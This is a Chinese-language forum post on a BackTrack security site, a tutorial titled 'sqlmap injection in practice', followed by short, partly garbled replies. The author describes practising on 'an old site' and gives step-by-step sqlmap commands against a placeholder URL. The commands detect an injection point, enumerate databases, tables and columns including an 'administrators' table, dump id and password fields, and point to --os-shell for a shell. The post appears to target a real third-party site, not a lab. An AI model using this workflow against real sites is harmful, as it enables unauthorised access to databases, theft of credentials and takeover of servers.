最新的backtrack5(bt5)官方网站已经提供下载,backtrack5是基于ubuntu Lucid LTS. 内核2.6.38开发的,完全开源并和GPL兼容。

Backtrack 中文网

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

搜索
查看: 18111|回复: 126

[教程] 【原创】sqlmap实战注入

 [复制链接]
受星波
黄秀婉
0x00:借口
很久不手注了,sqlmap都跨越好几个版本了(just a joke)。基本语法都忘了,找个老站练手,熟能生巧。


0x01:检测注入点
  1. sqlmap -u http://www.xxoo.com/subcat.php?id=2
复制代码

1.检测注入点

1.检测注入点



0x02:列出当前数据库信息
  1. sqlmap -u http://www.xxoo.com/subcat.php?id=2 --dbs
复制代码

2.列出当前数据库信息

2.列出当前数据库信息



0x03:指定该库名列出所有表
  1. sqlmap -u http://www.xxoo.com/subcat.php?id=2 -D databasename --tables
复制代码

获取当前库名称:
  1. sqlmap -u http://www.xxoo.com/subcat.php?id=2 --current-db
复制代码

3.指定该库名列出所有表

3.指定该库名列出所有表



0x04:指定该库名的表名列出所有字段
  1. sqlmap -u http://www.xxoo.com/subcat.php?id=2 -D bible_history -T administrators --columns
复制代码

4.指定该库名的表名列出所有字段

4.指定该库名的表名列出所有字段



0x05:指定库名表名字段dump出指定字段
  1. sqlmap -u http://xxoo.com/subcat.php?id=2 -D databasename -T admin -C id,password --dump
复制代码

5.指定库名表名字段dump出指定字段

5.指定库名表名字段dump出指定字段


取shell啥的就不多说了:--os-shell


最后,附详细教程:
游客,如果您要查看本帖隐藏内容请回复


+1
18239°C
126
  • blackeagle
  • kongjye
  • beyondbeiyang
  • levis_hao
  • wangzai
过: 他们
卫闵
查明朗
沙发~         
琛云
嘉星
最姐快砣タ纯/td>
夏侯夏璇
竹昕珏
身份卡通领导人人人人人人人人人人人
逮康震
蔺勇毅
楼主好牛~~向大神学习~
卫炯宽
月梅
菜鸟来学习
操雅柔
漫烨伟
感谢分享,努力学习。
芳静
然锋
最姐快砣タ纯/td>
奕歌飞
卫瑞水
赞一个,赞赞赞赞赞
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

BackTrack是一套专业的计算机安全检测的Linux操作系统,简称BT。BackTrack 是一个基于Ubuntu GNU/Linux的发行版本,主要用做数字取证和入侵测试。它的名字引用自回溯法(backtracking)。BackTrack 给用户提供了大量功能强大但简单易用的安全工具软件。BackTrack还支持Live CD和Live USB启动方式,用户可以直接从移动介质启动该系统而不用将系统安装在硬盘上。BackTrack被设计成一体化的旨在安全审计用的livecd,曾经它是被最广泛采用的渗透测试框架并被世界各地的安全社区所使用。现在,BackTrack已被Kali Linux所代替,BT将不再维护。
快速回复 返回顶部 返回列表